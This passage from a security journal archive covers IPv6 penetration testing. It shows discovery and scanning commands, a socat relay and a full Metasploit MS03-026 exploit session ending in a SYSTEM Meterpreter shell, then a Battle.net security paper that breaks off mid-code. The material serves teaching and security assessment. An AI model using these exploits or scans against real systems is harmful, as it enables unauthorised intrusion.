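    three MAC bytes, then ff:fe, then the last three MAC bytes.
    (Real stacks also flip the universal/local bit per RFC 4291.)"""
    b = [int(octet, 16) for octet in mac.split(":")]
    iid = b[:3] + [0xFF, 0xFE] + b[3:]
    groups = ["%02x%02x" % (iid[i], iid[i + 1]) for i in range(0, 8, 2)]
    return ipaddress.IPv6Address("fe80::" + ":".join(groups))

print(link_local_from_mac("01:02:03:04:05:06"))  # fe80::102:3ff:fe04:506
```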
2.4) The IPv6 Attack Toolkit
In order to enumerate local hosts using the Neighbor Discovery protocol, we
need a tool which can send ICMPv6 probes and listen for responses. The alive6
program included with Van Hauser's IPv6 Attack Toolkit is the tool for the
job. The example below demonstrates how to use alive6 to discover IPv6 hosts
attached to the network on the eth0 interface.
# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive
2.5) Linux Neighbor Discovery Tools
The 'ip' command, in conjunction with 'ping6', both included with many recent
Linux distributions, can also be used to perform local IPv6 node discovery.
The following commands demonstrate this method:
# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE
fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx REACHABLE
[...]
2.6) Local Broadcast Addresses
IPv6 Neighbor Discovery relies on a set of special broadcast addresses in
order to reach all local nodes of a given type. The table below enumerates the
most useful of these addresses.
- FF01::1 = This address reaches all node-local IPv6 nodes
- FF02::1 = This address reaches all link-local IPv6 nodes
- FF05::1 = This address reaches all site-local IPv6 nodes
- FF01::2 = This address reaches all node-local IPv6 routers
- FF02::2 = This address reaches all link-local IPv6 routers
- FF05::2 = This address reaches all site-local IPv6 routers
2.7) IPv4 vs IPv6 Broadcasts
The IPv4 protocol allowed packets destined to network broadcast addresses to
be routed across the Internet. While this had some legitimate uses, this
feature was abused for years by traffic amplification attacks, which spoofed a
query to a broadcast address from a victim in order to saturate the victim's
bandwidth with the responses. While some IPv4 services were designed to work
with broadcast addresses, this is the exception and not the norm. With the
introduction of IPv6, broadcast addresses are no longer routed outside of the
local network. This mitigates traffic amplification attacks, but also prevents
a host from sending Neighbor Discovery probes into remote networks.
One of the major differences between IPv4 and IPv6 is how network services
which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests
destined to the broadcast address. A good example of this is the BIND DNS
server. When using IPv4 and listening to 0.0.0.0, DNS requests sent to the
network broadcast address are simply ignored. When using IPv6 and listening to
::0, DNS requests sent to the link-local all nodes broadcast address (FF02::1)
are processed. This allows a local attacker to send a message to all BIND
servers on the local network with a single packet. The same technique will
work for any other UDP-based service bound to the ::0 address of an
IPv6-enabled interface.
$ dig metasploit.com @FF02::1
;; ANSWER SECTION:
metasploit.com. 3600 IN A 216.75.15.231
;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx%2#53(ff02::1)
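The same broadcast query can be sketched in Python. The dns_query helper
below is hypothetical (a query hand-built with struct rather than a DNS
library), and the send itself is left commented out since it requires a live
IPv6-enabled interface:

```python
import struct

def dns_query(name, qid=0x1234):
    # DNS header: id, flags (recursion desired), 1 question, no other records.
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    # Question name as length-prefixed labels, NUL-terminated.
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN

# To reach every listening resolver on the link, as the dig example does:
# import socket
# s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# s.sendto(dns_query("metasploit.com"), ("ff02::1%eth0", 53))
```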
3) Services
3.1) Using Nmap
The Nmap port scanner has support for IPv6 targets; however, it can only scan
these targets using the native networking libraries and does not have the
ability to send raw IPv6 packets. This limits TCP port scans to the
"connect()" method, which while effective, is slow against firewalled hosts
and requires a full TCP connection to identify each open port. Even with these
limitations, Nmap is still the tool of choice for IPv6 port scanning. Older
versions of Nmap did not support scanning link-local addresses, due to the
requirement of an interface suffix. Trying to scan a link-local address would
result in the following error.
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx
Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT
Strange error from connect (22):Invalid argument
The problem is that link-local addresses are interface specific. In order to
talk to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must indicate which
interface it is on as well. The way to do this on the Linux platform is by
appending a "%" followed by the interface name to the address. In this case,
we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap
(4.68) now support the interface suffix and have no problem scanning
link-local IPv6 addresses. Site-local addresses do not require a scope ID
suffix, which makes them a little bit easier to use from an attacker's
perspective (reverse connect code doesn't need to know the scope ID, just the
address).
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
PORT STATE SERVICE
22/tcp open ssh
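The same scope-ID notation matters when writing custom tooling. The helpers
below are a hypothetical sketch: on Linux, an AF_INET6 socket address is a
4-tuple whose last element is the interface index named by the "%" suffix:

```python
import socket

def parse_scoped(addr):
    """Split 'fe80::...%eth0' into (address, scope) -- the RFC 4007 notation."""
    host, _, scope = addr.partition("%")
    return host, scope or None

def connect_link_local(addr, port):
    # Hypothetical helper: resolve the scope name to an interface index
    # and place it in the sockaddr 4-tuple's last slot.
    host, scope = parse_scoped(addr)
    scope_id = socket.if_nametoindex(scope) if scope else 0
    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    s.connect((host, port, 0, scope_id))
    return s

# connect_link_local("fe80::xxxx:xxxx:xxxx:xxxx%eth0", 22)
```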
3.2) Using Metasploit
The development version of the Metasploit Framework includes a simple TCP port
scanner. This module accepts a list of hosts via the RHOSTS parameter and a
start and stop port. The Metasploit Framework has full support for IPv6
addresses, including the interface suffix. The following example scans ports 1
through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface
eth0. This target is a default install of Vista Home Premium.
# msfconsole
msf> use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357
[*] Auxiliary module execution completed
In addition to TCP port scanning, the Metasploit Framework also includes a UDP
service detection module. This module sends a series of UDP probes to every
host defined by RHOSTS and prints out any responses received. This module
works with any IPv6 address, including the broadcast. For example, the session
below demonstrates discovery of a local DNS service that is listening on ::0
and responds to requests for the link-local all nodes broadcast address.
# msfconsole
msf> use auxiliary/scanner/discovery/sweep_udp
msf auxiliary(sweep_udp) > set RHOSTS ff02::1
msf auxiliary(sweep_udp) > run
[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts)
[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0
[*] Auxiliary module execution completed
4) Exploits
4.1) IPv6 Enabled Services
When conducting a penetration test against an IPv6 enabled system, the first
step is to determine what services are accessible over IPv6. In the previous
section, we described some of the tools available for doing this, but did not
cover the differences between the IPv4 and IPv6 interfaces of the same
machine. Consider the Nmap results below, the first set is from scanning the
IPv6 interface of a Windows 2003 system, while the second is from scanning the
same system's IPv4 address.
# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
9464/tcp open unknown
# nmap -sS -p1-10000 -n 192.168.0.147
25/tcp open smtp
42/tcp open nameserver
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
3389/tcp open ms-term-serv
9464/tcp open unknown
Of the services provided by IIS, only the web server and streaming media
services appear to be IPv6 enabled. The SMTP, POP3, WINS, NetBIOS, and RDP
services were all missing from our scan of the IPv6 address. While this does
limit the attack surface on the IPv6 interface, the remaining services are
still significant in terms of exposure. The SMB port (445) allows access to
file shares and remote API calls through DCERPC. All TCP DCERPC services are
still available, including the endpoint mapper, which provides us with a list
of DCERPC applications on this system. The web server (IIS 6.0) is accessible,
along with any applications hosted on this system. The streaming media
services RTSP (554) and MMS (1755) provide access to the streaming content and
administrative interfaces.
4.2) IPv6 and Web Browsers
While most modern web browsers have support for IPv6 addresses within the URL
bar, there are complications. For example, with the Windows 2003 system above,
we see that port 80 is open. To access this web server with a browser, we use
the following URL:
http://[fe80::24c:44ff:fe4f:1a44%eth0]/
Unfortunately, while Firefox and Konqueror can process this URL, Internet
Explorer (6 and 7) cannot. Since this is a link-local address, DNS is not
sufficient, because the local scope ID is not recognized in the URL. An
interesting difference between Firefox 3 and Konqueror is how the Host header
is created when specifying a IPv6 address and scope ID. With Firefox 3, the
entire address, including the local scope ID is sent in the HTTP Host header.
This causes IIS 6.0 to return an "invalid hostname" error back to the browser.
However, Konqueror will strip the local scope ID from the Host header, which
prevents IIS from throwing the error message seen by Firefox.
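Konqueror's behavior is easy to reproduce in a custom client. The
host_header helper below is a hypothetical sketch that strips the scope ID
and brackets the literal before building the Host header:

```python
def host_header(addr):
    """Drop any '%scope' suffix and bracket the IPv6 literal, the way
    Konqueror does, so that IIS does not reject the hostname."""
    return "[" + addr.partition("%")[0] + "]"

print(host_header("fe80::24c:44ff:fe4f:1a44%eth0"))  # [fe80::24c:44ff:fe4f:1a44]
```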
4.3) IPv6 and Web Assessments
One of the challenges with assessing IPv6-enabled systems is making existing
security tools work with the IPv6 address format (especially the local scope
ID). For example, the Nikto web scanner is an excellent tool for web
assessments, but it does not have direct support for IPv6 addresses. While we
can add an entry to /etc/hosts for the IPv6 address we want to scan and pass
this to Nikto, Nikto is unable to process the scope ID suffix. The solution to
this and many other tool compatibility issues is to use a TCPv4 to TCPv6 proxy
service. By far, the easiest tool for the job is Socat, which is available as
a package on most Linux and BSD distributions. To relay local port 8080 to
remote port 80 on a link-local IPv6 address, we use a command like the one
below:
$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80
Once Socat is running, we can launch Nikto and many other tools against port
8080 on 127.0.0.1.
$ ./nikto.pl -host 127.0.0.1 -port 8080
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 8080
+ Start Time: 2008-10-01 12:57:18
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
This port forwarding technique works for many other tools and protocols and is
a great fall-back when the tool of choice does not support IPv6 natively.
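Where socat is unavailable, the same idea can be sketched in a few lines of
Python. The relay function below is a hypothetical, minimal stand-in for the
socat command above (one thread per direction, no error handling beyond EOF):

```python
import socket
import threading

def _pipe(src, dst):
    # Copy bytes one way until EOF, then half-close the peer.
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def relay(listen_addr, target_addr, target_family=socket.AF_INET6):
    """Accept TCPv4 clients on listen_addr and splice each one to
    target_addr, e.g. ("fe80::24c:44ff:fe4f:1a44%eth0", 80)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen_addr)
    srv.listen(5)
    while True:
        client, _ = srv.accept()
        upstream = socket.socket(target_family, socket.SOCK_STREAM)
        upstream.connect(target_addr)
        threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

# Equivalent of the socat line above (requires a live link-local target):
# relay(("127.0.0.1", 8080), ("fe80::24c:44ff:fe4f:1a44%eth0", 80))
```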
4.4) Exploiting IPv6 Services
The Metasploit Framework has native support for IPv6 sockets, including the
local scope ID. This allows nearly all of the exploit and auxiliary modules to
be used against IPv6 hosts with no modification. In the case of web
application exploits, the VHOST parameter can be used to override the Host
header sent by the module, avoiding issues like the one described above.
4.5) IPv6 Enabled Shellcode
To restrict all exploit activity to the IPv6 protocol, not only do the
exploits need support for IPv6, but the payloads as well. IPv6 payload support
is available in Metasploit through the use of "stagers". These stagers can be
used to chain-load any of the common Windows payloads included with the
Metasploit Framework. Once again, link-local addresses make this process a
little more complicated. When using the bind_ipv6_tcp stager to open a listening
port on the target machine, the RHOST parameter must have the local scope ID
appended. By the same token, the reverse_ipv6_tcp stager requires that the LHOST
variable have the remote machine's interface number appended as a scope ID. This
can be tricky, since the attacker rarely knows what interface number a given
link-local address corresponds to. For this reason, the bind_ipv6_tcp stager is
ultimately more useful for exploiting Windows machines with link-local
addresses. The example below demonstrates using the bind_ipv6_tcp stager with
the Meterpreter stage. The exploit in this case is MS03-026 (Blaster) and is
delivered over the DCERPC endpoint mapper service on port 135.
msf> use windows/exploit/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
5) Summary
5.1) Key Concepts
Even though most networks are not "IPv6" ready, many of the machines on those
networks are. The introduction of a new protocol stack introduces security
challenges that are not well-known and often overlooked during security
evaluations. The huge address range of IPv6 makes remote discovery of IPv6
machines difficult, but local network discovery is still possible using the
all-nodes broadcast addresses. Link-local addresses are tied to a specific
network link and are only guaranteed unique on that network link where they
reside. In order to communicate with an IPv6 node using a link-local address,
the user must have knowledge of the local scope ID (interface) for that link.
In order for a remote application to connect back to the user over a
link-local address, the socket code must specify the local scope ID of the
correct interface. UDP services which listen on the IPv6 ANY address (::0)
will respond to client requests that are sent to the all-nodes broadcast
address (FF02::1), which differs from IPv4. IPv6 broadcast traffic is not
routable, which limits many attacks to the local network only. Even though
many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all
applications support listening on the IPv6 interfaces. Software firewalls
often allow IPv6 traffic even when configured to block all IPv4 traffic.
Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many
other security tools now support IPv6 targets. It is possible to use a tool
written for IPv4 against an IPv6 host by using a socket relay tool such as
xinetd or socat.
5.2) Conclusion
Although the IPv6 backbone infrastructure continues to grow and an increasing
number of client systems and devices support IPv6 out of the box, few ISPs are
able to provide routing between the customer site and the backbone. Until this
gap is closed, security assessments against IPv6 addresses will be limited to
the local network. The lack of awareness about IPv6 in most organizations can
provide an easy way for an attacker to bypass network controls and fly under
the radar of many security monitoring tools. After all, when confronted with
the message below, what is an administrator to do?
References
Exploits
- THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
- The Metasploit Framework - http://metasploit.com
- Immunity CANVAS - http://www.immunitysec.com/
Tools
- ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest)
- socat - http://www.dest-unreach.org/socat/
- scapy - http://www.secdev.org/projects/scapy/
- nmap - http://nmap.org/
- nikto - http://www.cirt.net/nikto2
Documentation
- RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt
- Official IPv6 Site - http://www.ipv6.org/
Application Compatibility
- http://www.deepspace6.net/docs/ipv6statuspageapps.html
- http://www.stindustries.net/IPv6/tools.html
- http://www.ipv6.org/v6-apps.html
- http://applications.6pack.org/browse/support/
uninformed/10.txt
Engineering in Reverse
Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
Skywing
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.
pdf | html | txt
Using dual-mappings to evade automated unpackers
skape
Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.
pdf | html | txt
Exploitation Technology
Analyzing local privilege escalations in win32k
mxatone
This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
pdf | html | txt
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
H D Moore
This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.
pdf | html | txt
uninformed/2.1.txt
Inside Blizzard: Battle.net
Skywing
skywinguninformed@valhallalegends.com
Last modified: 8/31/2005
1) Foreword
Abstract: This paper intends to describe a variety of the problems Blizzard
Entertainment has encountered from a practical standpoint through their
implementation of the large-scale online game matchmaking and chat service,
Battle.net. The paper provides some background historical information into
the design and purpose of Battle.net and continues on to discuss a variety of
flaws that have been observed in the implementation of the system. Readers
should come away with a better understanding of problems that can be easily
introduced in designing a matchmaking/chat system to operate on such a large
scale in addition to some of the serious security-related consequences of not
performing proper parameter validation of untrusted clients.
2) Introduction
First, a bit of historical and background information, leading up to the
present day. Battle.net is an online matchmaking service that allows players
to set up online games with other players. It is quite possibly the oldest
and largest system of its kind currently in existence (launched in 1997).
The basic services provided by Battle.net are game matchmaking and chat. The
matchmaking system allows one to create and join games with little or no prior
configuration required (other than picking game parameters, such as a map to
play on, or so-forth). The chat system is similar to a stripped-down version
of Internet Relay Chat. The primary differences between IRC and Battle.net
(for the purposes of the chat system) are that Battle.net only allows a user
to be present in one chat channel at once, and many of the channel parameters
that IRC users might be familiar with (maximum number of users in the channel,
who has channel operator privileges) are fixed to well-defined values by the
server.
Battle.net supports a wide variety of Blizzard games, including Diablo,
Starcraft, Warcraft II: Battle.net Edition, Diablo II, and Warcraft III. In
addition, there are shareware versions of Diablo and Starcraft that are
supported on Battle.net, as well as optional expansions for Diablo II,
Starcraft, and Warcraft III. All of these games share a common binary
communication protocol that has evolved over the past 8 years, although
different games have differing capabilities with respect to the protocol.
In some cases, this is due to differing requirements for the game clients, but
usually this is simply due to the older programs not being updated as
frequently as newer versions. In short, there are a number of different
dialects of the Battle.net binary protocol that are used by the various
supported products, all at the same time. In addition to supporting an
undocumented binary protocol, Battle.net has for some time now supported a
text-based protocol (the ``Chat Gateway'', as officially documented). This
protocol supports a limited subset of the features available to clients using
the full game protocol. In particular, it lacks support for capabilities such
as account creation and management.
Both of these protocols are now fairly well understood and documented by certain
persons outside of Blizzard. Although the text-based protocol is documented
and fairly stable, the limitations inherent in it make it undesirable for many
uses. Furthermore, in order to help stem the flood of spam on Battle.net,
Blizzard changed their server software to prevent clients using the text-based
protocol from entering all but a few pre-defined chat channels. As a result
of this, many developers have reverse engineered (or more commonly, used the
work of those who came before them) the Battle.net binary protocol and written
their own "emulator" clients for various purposes (typically as a better
alternative to the limited chat facilities provided by Blizzard's game
clients). These clients emulate the behavior of a particular Blizzard game
program in order to trick Battle.net into providing the services typically
only offered to the game clients, hence the name ``emulator client''. Most of
these clients are referred to as ``emulator bots'' or ``emubots'' by their
developers, and the Battle.net community in general. In fact, there are also
partially compliant server implementations that implement the server-side chat
and matchmaking logic supported by Battle.net to varying degrees of accuracy.
One can today download a third party server that emulates the Battle.net
protocol, and a third party client that emulates a Blizzard client supporting
the Battle.net protocol, and have the two inter-operate.
3) Battle.net issues
By virtue of supporting so many different game clients (at present, there are
11 distinct Blizzard-supported programs that connect to Battle.net), Blizzard
has a sizable version-control problem. In fact, this problem is compounded by
several issues.
First, many client game patches add or change the protocol in significant
ways. For instance, the notion of password-protected, persistent player
accounts was not originally even designed into Battle.net, and was added at a
later date via a client patch (and server-side modifications).
On top of that, many clients also have very significant differences in feature
support. To give an example, for many years Diablo and Diablo Shareware were
both supported on Battle.net concurrently while Diablo supported user accounts
and the shareware version did not. As one can imagine, this sort of thing can
give rise to a great many problems. The version control and update mechanism
is not separate from the rest of the protocol. Indeed, the same server, and
the same connection, are used for version control, but a different connection
to the same server is used for the transfer of client patches. As a result,
any compliant Battle.net server is required to support not only the current
Battle.net protocol version that is in use by the current patch level of every
existing client, but it must also support the first few messages used by every
single version of every single Battle.net client ever released, or at least
until the version checking mechanism can be invoked to distribute a new
version (which is not the first task that occurs in some older iterations of
the protocol).
To make matters worse, there is now a proliferation of third party clients
using the Battle.net protocol (to varying degrees of accuracy compared to the
Blizzard game clients they attempt to emulate) in use on Battle.net today.
This began sometime in mid-1999 when a program called ``NBBot'', authored by
Andreas Hansson, who often goes by the handle ``Adron'', entered widespread
distribution, though this was not the intent of the author. NBBot was the
first third party client to emulate the Battle.net protocol to an extent that
allowed it to masquerade as a game client. Several years later, the source
code for this program was inadvertently released to wide-spread public
distribution, which kicked off large-scale development of third party
Battle.net protocol clients by a number of authors.
Despite all of these challenges, Blizzard has managed to keep Battle.net up
and running for nearly a decade now, and claims over a million active users.
However, the road leading up to the present day has not been ``clear sailing''
for Blizzard. This leads us into some of the specific problems facing
Battle.net leading up until the present day. One of the major classes of
problems encountered by Blizzard as Battle.net has grown is that it was (in
the author's opinion) simply not designed to support the circumstances in
which it eventually ended up being used. This is evident in a variety of
events that have occurred over the past few years:
- The addition of persistent player accounts to the system.
- The addition of the text-based chat protocol to the system.
- Significant changes to the backend architecture utilized by
Battle.net.
Although it is difficult to provide exact details of these changes, having not
worked at Blizzard, many of them can be inferred.
3.1) Network issues
Battle.net was originally setup as a small number of linked servers placed at
various strategic geographical locations. They were ``linked'' in the sense
that players on one server could interact with players on a different server
as seamlessly as with players connected to the same server. This architecture
eventually proved unsupportable, as increasing usage of Battle.net led to the
common occurrence of "server splits", in which one or more servers would be
unable to keep up with the rest of the network and become temporarily
disconnected.
Eventually, the system was split into two separate networks (each starting
with a copy of all account and player data present at the time of the
division): the Asian network, and the United States and European network. Each
network was comprised of a number of different servers that players could
connect to in an optimized fashion based on server response time.
Some time later, even this system proved untenable. The network was once
again permanently fragmented, this time splitting the United States and
European network into three subnetworks. This is the topology retained today,
with the networks designated ``USEast'', ``USWest'', ``Europe'', and ``Asia''.
It
is believed that all servers in a server network (also referred to as a
``cluster'' or ``gateway'') are, at present, located at the same physical
hosting facility on a high-speed LAN.
As new game requirements came about, a new architecture for Diablo II and
Warcraft III was required. In these cases, games are hosted on
Blizzard-operated servers and not on client machines in order to make them
more resilient from attempts to hack the game to gain an unfair advantage.
There are significant differences to how this is implemented for Diablo II and
Warcraft III, and it is not used for certain types of games in Warcraft III.
This resulted in a significant change to the way the service performs its
primary function, that is, game matchmaking.
3.2) Client/Server issues
Aside from the basic network design issues, other problems have arisen from
the fact that Blizzard did not expect, or intend for, third party programs to
use its Battle.net protocol. As a result, proper validation has not always
been in place for certain conditions that would not be generated through the
Blizzard client software.
As mentioned earlier, many developers eventually turned to using the
Battle.net protocol directly as opposed to the text-based protocol in order to
circumvent certain limitations in the text-based protocol. There are a number
of reasons for this. Historically, clients utilizing the Battle.net protocol
have been able to enter channels that are already full (private channels on
Battle.net have a limit of 40 users, normally), and have been able to perform
various account management functions (such as creating accounts, changing
passwords, managing user profile information, and so-forth) that are not
doable through the text-based protocol.
In addition to having access to extended protocol-level functionality, clients
using the Battle.net protocol are permitted to open up to eight connections to
a single Battle.net network per IP address (as opposed to the text-based
protocol, which only allows a single connection per IP address). This limit
was originally four connections per IP address, and was raised after NATs,
particularly in cyber cafes, gained popularity.
This was particularly attractive to a number of persons on Battle.net who used
third-party chat clients for a variety of reasons. The primary reason was
generally the same ``channel war'' phenomenon that has historically plagued
IRC was also rather prevalent on Battle.net, and being able to field a large
number of clients per IP address was seen as a significant advantage.
Due to the prevalence of ``channel wars'' on Battle.net, artificially large
numbers of third-party clients utilizing the Battle.net protocol came into
use. Although it is difficult to estimate the exact number of users of such
clients, the author has observed upwards of several thousand being logged on
to the service at once.
The development and usage of said third party clients has resulted in the
discovery of a number of other issues with Battle.net. While most of the
issues covered here are either already fixed or relatively minor, there is
still value in discussing them.
3.2.1) Client connection limits
Through the use of certain messages in the Battle.net protocol, it is possible
to enter a channel beyond the normal 40 user limit. This was due to the fact
that the method a game client would use to return to a chat channel after
leaving a game would not properly check the user count. After miscreants
exploited this vulnerability to put thousands of users into one channel, which
subsequently led to server crashes, Blizzard finally fixed this
vulnerability.
3.2.2) Chat message server overflow
The server software often assumed that the client would only perform 'sane'
actions, and one of these assumptions dealt with how long of a chat message a
client could send. The server apparently copied a chat message indicated by a
Battle.net protocol client into a fixed 512-byte buffer without proper length
checking, such that a client could crash a server by sending a long enough
message. Due to the fact that Blizzard's server binaries are not publicly
available, it would not have been easy to exploit this flaw to run arbitrary
code on the server. This serious vulnerability was fixed within a day of
being reported.
3.2.3) Client authentication
Aside from general sanity checks, Blizzard also has had some issues relating
to authentication. Blizzard currently has two systems in use for user account
password authentication. In order to create a third party client, these
systems had to be understood and third party implementations produced. This
has revealed several flaws in their implementation.
The first system Blizzard utilizes is a challenge-response system that uses a
SHA-1 hash of the client's password. The game client implementation of this
system lowercases the entire password string before hashing it, significantly
reducing password security. (A third party client could opt not to do this,
and as such create an account that is impossible to log on to through the
official Blizzard game clients or the text-based protocol. The text-based
protocol sends a user's password in cleartext, after which the server
lowercases the password and internally compares a hash of it with the account
in question's password in a database.) However, a more serious security
problem remains: in SHA-1, there are a number of bit rotate left (``ROL'')
operations. The Blizzard programmer responsible for implementing this
apparently switched the two parameters in every call to ROL. That is, if
there was a ``define ROL(a, b) (...)'' macro, the programmer swapped the two
arguments. This drastically reduces the security of Battle.net password
hashes, as most of the data being hashed ends up being zero bits. Because of
the problem of incompatibility with previously created accounts, this system
is still in use today.
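The effect of the swapped arguments can be seen in a minimal Python sketch of
a 32-bit rotate-left. The word and rotate count below are hypothetical stand-ins
for values from the SHA-1 round function, and the count is taken mod 32 to
mimic x86 rotate semantics, as the original C implementation would behave:

```python
def rol32(value, count):
    """32-bit rotate left; count taken mod 32, matching x86 rotates."""
    count %= 32
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF

word = 0xDEADBEEF  # hypothetical data word from the message schedule
count = 5          # hypothetical rotate count from the round function

correct = rol32(word, count)  # rotates the data word, as SHA-1 specifies
swapped = rol32(count, word)  # arguments reversed: rotates the constant 5
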